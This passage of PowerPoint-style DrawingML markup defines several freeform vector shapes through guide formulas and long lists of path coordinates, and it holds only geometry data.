                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="305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8" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2635250" y="2368550"/>
                <a:ext cx="307975" cy="219075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 856"/>
                  <a:gd name="T1" fmla="*/ 110 h 610"/>
                  <a:gd name="T2" fmla="*/ 283 w 856"/>
                  <a:gd name="T3" fmla="*/ 231 h 610"/>
                  <a:gd name="T4" fmla="*/ 283 w 856"/>
                  <a:gd name="T5" fmla="*/ 231 h 610"/>
                  <a:gd name="T6" fmla="*/ 283 w 856"/>
                  <a:gd name="T7" fmla="*/ 231 h 610"/>
                  <a:gd name="T8" fmla="*/ 267 w 856"/>
                  <a:gd name="T9" fmla="*/ 194 h 610"/>
                  <a:gd name="T10" fmla="*/ 267 w 856"/>
                  <a:gd name="T11" fmla="*/ 152 h 610"/>
                  <a:gd name="T12" fmla="*/ 273 w 856"/>
                  <a:gd name="T13" fmla="*/ 115 h 610"/>
                  <a:gd name="T14" fmla="*/ 289 w 856"/>
                  <a:gd name="T15" fmla="*/ 73 h 610"/>
                  <a:gd name="T16" fmla="*/ 289 w 856"/>
                  <a:gd name="T17" fmla="*/ 73 h 610"/>
                  <a:gd name="T18" fmla="*/ 310 w 856"/>
                  <a:gd name="T19" fmla="*/ 47 h 610"/>
                  <a:gd name="T20" fmla="*/ 330 w 856"/>
                  <a:gd name="T21" fmla="*/ 26 h 610"/>
                  <a:gd name="T22" fmla="*/ 351 w 856"/>
                  <a:gd name="T23" fmla="*/ 10 h 610"/>
                  <a:gd name="T24" fmla="*/ 378 w 856"/>
                  <a:gd name="T25" fmla="*/ 5 h 610"/>
                  <a:gd name="T26" fmla="*/ 378 w 856"/>
                  <a:gd name="T27" fmla="*/ 5 h 610"/>
                  <a:gd name="T28" fmla="*/ 404 w 856"/>
                  <a:gd name="T29" fmla="*/ 0 h 610"/>
                  <a:gd name="T30" fmla="*/ 436 w 856"/>
                  <a:gd name="T31" fmla="*/ 5 h 610"/>
                  <a:gd name="T32" fmla="*/ 467 w 856"/>
                  <a:gd name="T33" fmla="*/ 15 h 610"/>
                  <a:gd name="T34" fmla="*/ 498 w 856"/>
                  <a:gd name="T35" fmla="*/ 31 h 610"/>
                  <a:gd name="T36" fmla="*/ 855 w 856"/>
                  <a:gd name="T37" fmla="*/ 246 h 610"/>
                  <a:gd name="T38" fmla="*/ 782 w 856"/>
                  <a:gd name="T39" fmla="*/ 367 h 610"/>
                  <a:gd name="T40" fmla="*/ 451 w 856"/>
                  <a:gd name="T41" fmla="*/ 173 h 610"/>
                  <a:gd name="T42" fmla="*/ 451 w 856"/>
                  <a:gd name="T43" fmla="*/ 173 h 610"/>
                  <a:gd name="T44" fmla="*/ 420 w 856"/>
                  <a:gd name="T45" fmla="*/ 157 h 610"/>
                  <a:gd name="T46" fmla="*/ 393 w 856"/>
                  <a:gd name="T47" fmla="*/ 152 h 610"/>
                  <a:gd name="T48" fmla="*/ 393 w 856"/>
                  <a:gd name="T49" fmla="*/ 152 h 610"/>
                  <a:gd name="T50" fmla="*/ 373 w 856"/>
                  <a:gd name="T51" fmla="*/ 162 h 610"/>
                  <a:gd name="T52" fmla="*/ 351 w 856"/>
                  <a:gd name="T53" fmla="*/ 183 h 610"/>
                  <a:gd name="T54" fmla="*/ 351 w 856"/>
                  <a:gd name="T55" fmla="*/ 183 h 610"/>
                  <a:gd name="T56" fmla="*/ 346 w 856"/>
                  <a:gd name="T57" fmla="*/ 199 h 610"/>
                  <a:gd name="T58" fmla="*/ 341 w 856"/>
                  <a:gd name="T59" fmla="*/ 215 h 610"/>
                  <a:gd name="T60" fmla="*/ 341 w 856"/>
                  <a:gd name="T61" fmla="*/ 231 h 610"/>
                  <a:gd name="T62" fmla="*/ 346 w 856"/>
                  <a:gd name="T63" fmla="*/ 246 h 610"/>
                  <a:gd name="T64" fmla="*/ 351 w 856"/>
                  <a:gd name="T65" fmla="*/ 257 h 610"/>
                  <a:gd name="T66" fmla="*/ 362 w 856"/>
                  <a:gd name="T67" fmla="*/ 272 h 610"/>
                  <a:gd name="T68" fmla="*/ 393 w 856"/>
                  <a:gd name="T69" fmla="*/ 299 h 610"/>
                  <a:gd name="T70" fmla="*/ 714 w 856"/>
                  <a:gd name="T71" fmla="*/ 488 h 610"/>
                  <a:gd name="T72" fmla="*/ 640 w 856"/>
                  <a:gd name="T73" fmla="*/ 609 h 610"/>
                  <a:gd name="T74" fmla="*/ 0 w 856"/>
                  <a:gd name="T75" fmla="*/ 231 h 610"/>
                  <a:gd name="T76" fmla="*/ 73 w 856"/>
                  <a:gd name="T77" fmla="*/ 110 h 6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856" h="610">
                    <a:moveTo>
                      <a:pt x="73" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="11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9" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2786063" y="2195513"/>
                <a:ext cx="257175" cy="271462"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 572 w 715"/>
                  <a:gd name="T1" fmla="*/ 666 h 756"/>
                  <a:gd name="T2" fmla="*/ 572 w 715"/>
                  <a:gd name="T3" fmla="*/ 666 h 756"/>
                  <a:gd name="T4" fmla="*/ 582 w 715"/>
                  <a:gd name="T5" fmla="*/ 635 h 756"/>
                  <a:gd name="T6" fmla="*/ 588 w 715"/>
                  <a:gd name="T7" fmla="*/ 625 h 756"/>
                  <a:gd name="T8" fmla="*/ 582 w 715"/>
                  <a:gd name="T9" fmla="*/ 608 h 756"/>
                  <a:gd name="T10" fmla="*/ 582 w 715"/>
                  <a:gd name="T11" fmla="*/ 608 h 756"/>
                  <a:gd name="T12" fmla="*/ 572 w 715"/>
                  <a:gd name="T13" fmla="*/ 582 h 756"/>
                  <a:gd name="T14" fmla="*/ 551 w 715"/>
                  <a:gd name="T15" fmla="*/ 561 h 756"/>
                  <a:gd name="T16" fmla="*/ 0 w 715"/>
                  <a:gd name="T17" fmla="*/ 372 h 756"/>
                  <a:gd name="T18" fmla="*/ 89 w 715"/>
                  <a:gd name="T19" fmla="*/ 247 h 756"/>
                  <a:gd name="T20" fmla="*/ 451 w 715"/>
                  <a:gd name="T21" fmla="*/ 399 h 756"/>
                  <a:gd name="T22" fmla="*/ 451 w 715"/>
                  <a:gd name="T23" fmla="*/ 399 h 756"/>
                  <a:gd name="T24" fmla="*/ 178 w 715"/>
                  <a:gd name="T25" fmla="*/ 120 h 756"/>
                  <a:gd name="T26" fmla="*/ 257 w 715"/>
                  <a:gd name="T27" fmla="*/ 0 h 756"/>
                  <a:gd name="T28" fmla="*/ 608 w 715"/>
                  <a:gd name="T29" fmla="*/ 409 h 756"/>
                  <a:gd name="T30" fmla="*/ 608 w 715"/>
                  <a:gd name="T31" fmla="*/ 409 h 756"/>
                  <a:gd name="T32" fmla="*/ 651 w 715"/>
                  <a:gd name="T33" fmla="*/ 461 h 756"/>
                  <a:gd name="T34" fmla="*/ 682 w 715"/>
                  <a:gd name="T35" fmla="*/ 504 h 756"/>
                  <a:gd name="T36" fmla="*/ 682 w 715"/>
                  <a:gd name="T37" fmla="*/ 504 h 756"/>
                  <a:gd name="T38" fmla="*/ 703 w 715"/>
                  <a:gd name="T39" fmla="*/ 541 h 756"/>
                  <a:gd name="T40" fmla="*/ 714 w 715"/>
                  <a:gd name="T41" fmla="*/ 572 h 756"/>
                  <a:gd name="T42" fmla="*/ 714 w 715"/>
                  <a:gd name="T43" fmla="*/ 572 h 756"/>
                  <a:gd name="T44" fmla="*/ 714 w 715"/>
                  <a:gd name="T45" fmla="*/ 608 h 756"/>
                  <a:gd name="T46" fmla="*/ 708 w 715"/>
                  <a:gd name="T47" fmla="*/ 640 h 756"/>
                  <a:gd name="T48" fmla="*/ 708 w 715"/>
                  <a:gd name="T49" fmla="*/ 640 h 756"/>
                  <a:gd name="T50" fmla="*/ 693 w 715"/>
                  <a:gd name="T51" fmla="*/ 672 h 756"/>
                  <a:gd name="T52" fmla="*/ 667 w 715"/>
                  <a:gd name="T53" fmla="*/ 708 h 756"/>
                  <a:gd name="T54" fmla="*/ 635 w 715"/>
                  <a:gd name="T55" fmla="*/ 755 h 756"/>
                  <a:gd name="T56" fmla="*/ 546 w 715"/>
                  <a:gd name="T57" fmla="*/ 698 h 756"/>
                  <a:gd name="T58" fmla="*/ 546 w 715"/>
                  <a:gd name="T59" fmla="*/ 698 h 756"/>
                  <a:gd name="T60" fmla="*/ 572 w 715"/>
                  <a:gd name="T61" fmla="*/ 666 h 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15" h="756">
                    <a:moveTo>
                      <a:pt x="572" y="666"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="572" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="666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0" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2913063" y="2084388"/>
                <a:ext cx="207962" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 331 w 579"/>
                  <a:gd name="T1" fmla="*/ 405 h 558"/>
                  <a:gd name="T2" fmla="*/ 389 w 579"/>
                  <a:gd name="T3" fmla="*/ 431 h 558"/>
                  <a:gd name="T4" fmla="*/ 404 w 579"/>
                  <a:gd name="T5" fmla="*/ 425 h 558"/>
                  <a:gd name="T6" fmla="*/ 441 w 579"/>
                  <a:gd name="T7" fmla="*/ 399 h 558"/>
                  <a:gd name="T8" fmla="*/ 457 w 579"/>
                  <a:gd name="T9" fmla="*/ 373 h 558"/>
                  <a:gd name="T10" fmla="*/ 463 w 579"/>
                  <a:gd name="T11" fmla="*/ 347 h 558"/>
                  <a:gd name="T12" fmla="*/ 452 w 579"/>
                  <a:gd name="T13" fmla="*/ 321 h 558"/>
                  <a:gd name="T14" fmla="*/ 436 w 579"/>
                  <a:gd name="T15" fmla="*/ 299 h 558"/>
                  <a:gd name="T16" fmla="*/ 394 w 579"/>
                  <a:gd name="T17" fmla="*/ 289 h 558"/>
                  <a:gd name="T18" fmla="*/ 374 w 579"/>
                  <a:gd name="T19" fmla="*/ 294 h 558"/>
                  <a:gd name="T20" fmla="*/ 263 w 579"/>
                  <a:gd name="T21" fmla="*/ 357 h 558"/>
                  <a:gd name="T22" fmla="*/ 237 w 579"/>
                  <a:gd name="T23" fmla="*/ 373 h 558"/>
                  <a:gd name="T24" fmla="*/ 184 w 579"/>
                  <a:gd name="T25" fmla="*/ 389 h 558"/>
                  <a:gd name="T26" fmla="*/ 158 w 579"/>
                  <a:gd name="T27" fmla="*/ 389 h 558"/>
                  <a:gd name="T28" fmla="*/ 110 w 579"/>
                  <a:gd name="T29" fmla="*/ 383 h 558"/>
                  <a:gd name="T30" fmla="*/ 63 w 579"/>
                  <a:gd name="T31" fmla="*/ 352 h 558"/>
                  <a:gd name="T32" fmla="*/ 43 w 579"/>
                  <a:gd name="T33" fmla="*/ 331 h 558"/>
                  <a:gd name="T34" fmla="*/ 21 w 579"/>
                  <a:gd name="T35" fmla="*/ 305 h 558"/>
                  <a:gd name="T36" fmla="*/ 0 w 579"/>
                  <a:gd name="T37" fmla="*/ 242 h 558"/>
                  <a:gd name="T38" fmla="*/ 6 w 579"/>
                  <a:gd name="T39" fmla="*/ 210 h 558"/>
                  <a:gd name="T40" fmla="*/ 11 w 579"/>
                  <a:gd name="T41" fmla="*/ 168 h 558"/>
                  <a:gd name="T42" fmla="*/ 63 w 579"/>
                  <a:gd name="T43" fmla="*/ 89 h 558"/>
                  <a:gd name="T44" fmla="*/ 90 w 579"/>
                  <a:gd name="T45" fmla="*/ 53 h 558"/>
                  <a:gd name="T46" fmla="*/ 153 w 579"/>
                  <a:gd name="T47" fmla="*/ 11 h 558"/>
                  <a:gd name="T48" fmla="*/ 184 w 579"/>
                  <a:gd name="T49" fmla="*/ 0 h 558"/>
                  <a:gd name="T50" fmla="*/ 247 w 579"/>
                  <a:gd name="T51" fmla="*/ 5 h 558"/>
                  <a:gd name="T52" fmla="*/ 305 w 579"/>
                  <a:gd name="T53" fmla="*/ 37 h 558"/>
                  <a:gd name="T54" fmla="*/ 242 w 579"/>
                  <a:gd name="T55" fmla="*/ 152 h 558"/>
                  <a:gd name="T56" fmla="*/ 210 w 579"/>
                  <a:gd name="T57" fmla="*/ 131 h 558"/>
                  <a:gd name="T58" fmla="*/ 184 w 579"/>
                  <a:gd name="T59" fmla="*/ 126 h 558"/>
                  <a:gd name="T60" fmla="*/ 158 w 579"/>
                  <a:gd name="T61" fmla="*/ 131 h 558"/>
                  <a:gd name="T62" fmla="*/ 137 w 579"/>
                  <a:gd name="T63" fmla="*/ 147 h 558"/>
                  <a:gd name="T64" fmla="*/ 121 w 579"/>
                  <a:gd name="T65" fmla="*/ 195 h 558"/>
                  <a:gd name="T66" fmla="*/ 121 w 579"/>
                  <a:gd name="T67" fmla="*/ 210 h 558"/>
                  <a:gd name="T68" fmla="*/ 142 w 579"/>
                  <a:gd name="T69" fmla="*/ 242 h 558"/>
                  <a:gd name="T70" fmla="*/ 158 w 579"/>
                  <a:gd name="T71" fmla="*/ 252 h 558"/>
                  <a:gd name="T72" fmla="*/ 179 w 579"/>
                  <a:gd name="T73" fmla="*/ 252 h 558"/>
                  <a:gd name="T74" fmla="*/ 231 w 579"/>
                  <a:gd name="T75" fmla="*/ 231 h 558"/>
                  <a:gd name="T76" fmla="*/ 310 w 579"/>
                  <a:gd name="T77" fmla="*/ 184 h 558"/>
                  <a:gd name="T78" fmla="*/ 363 w 579"/>
                  <a:gd name="T79" fmla="*/ 152 h 558"/>
                  <a:gd name="T80" fmla="*/ 415 w 579"/>
                  <a:gd name="T81" fmla="*/ 147 h 558"/>
                  <a:gd name="T82" fmla="*/ 436 w 579"/>
                  <a:gd name="T83" fmla="*/ 147 h 558"/>
                  <a:gd name="T84" fmla="*/ 489 w 579"/>
                  <a:gd name="T85" fmla="*/ 168 h 558"/>
                  <a:gd name="T86" fmla="*/ 510 w 579"/>
                  <a:gd name="T87" fmla="*/ 184 h 558"/>
                  <a:gd name="T88" fmla="*/ 562 w 579"/>
                  <a:gd name="T89" fmla="*/ 247 h 558"/>
                  <a:gd name="T90" fmla="*/ 573 w 579"/>
                  <a:gd name="T91" fmla="*/ 278 h 558"/>
                  <a:gd name="T92" fmla="*/ 578 w 579"/>
                  <a:gd name="T93" fmla="*/ 315 h 558"/>
                  <a:gd name="T94" fmla="*/ 562 w 579"/>
                  <a:gd name="T95" fmla="*/ 383 h 558"/>
                  <a:gd name="T96" fmla="*/ 541 w 579"/>
                  <a:gd name="T97" fmla="*/ 420 h 558"/>
                  <a:gd name="T98" fmla="*/ 515 w 579"/>
                  <a:gd name="T99" fmla="*/ 457 h 558"/>
                  <a:gd name="T100" fmla="*/ 447 w 579"/>
                  <a:gd name="T101" fmla="*/ 525 h 558"/>
                  <a:gd name="T102" fmla="*/ 410 w 579"/>
                  <a:gd name="T103" fmla="*/ 546 h 558"/>
                  <a:gd name="T104" fmla="*/ 378 w 579"/>
                  <a:gd name="T105" fmla="*/ 557 h 558"/>
                  <a:gd name="T106" fmla="*/ 316 w 579"/>
                  <a:gd name="T107" fmla="*/ 546 h 558"/>
                  <a:gd name="T108" fmla="*/ 284 w 579"/>
                  <a:gd name="T109" fmla="*/ 530 h 558"/>
                  <a:gd name="T110" fmla="*/ 237 w 579"/>
                  <a:gd name="T111" fmla="*/ 494 h 558"/>
                  <a:gd name="T112" fmla="*/ 331 w 579"/>
                  <a:gd name="T113" fmla="*/ 405 h 5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79" h="558">
                    <a:moveTo>
                      <a:pt x="331" y="405"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="331" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
